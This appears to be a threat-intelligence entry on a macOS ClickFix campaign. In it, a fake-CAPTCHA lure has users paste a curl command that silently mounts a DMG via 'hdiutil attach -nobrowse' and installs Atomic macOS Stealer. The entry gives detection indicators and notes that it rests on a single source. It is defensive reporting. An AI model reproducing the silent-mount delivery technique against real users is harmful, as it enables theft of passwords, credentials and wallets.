macOS ClickFix evolves: `hdiutil attach -nobrowse` mounts the malicious DMG invisibly before dropping AMOS `[SINGLE-SOURCE]`

A new macOS ClickFix variant (Palo Alto Unit 42, via BleepingComputer 2026-06-23) drops the visible-DMG step: the fake-CAPTCHA Terminal lure now has the user paste a curl command that uses hdiutil attach -nobrowse to mount the disk image without it appearing in Finder or on the desktop, then launches a self-signed app via open (BleepingComputer, 2026-06-23). The payload is Atomic macOS Stealer (AMOS): it presents a fake System Preferences authentication prompt to capture the local password, then steals browser credentials across numerous Chromium- and Firefox-derived browsers, cryptocurrency-wallet data, and Keychain contents. [SINGLE-SOURCE] — BleepingComputer attributes to Unit 42 but a separate primary Unit 42 article for this specific technique was not located this run (see § 7). Detection on macOS: hdiutil attach -nobrowse invoked by a shell parented by Terminal; Terminal executing pasted commands referencing external download URLs; apps launched from /Volumes/ mounts; user awareness that legitimate CAPTCHAs never require Terminal input (T1204.001, T1105, T1555).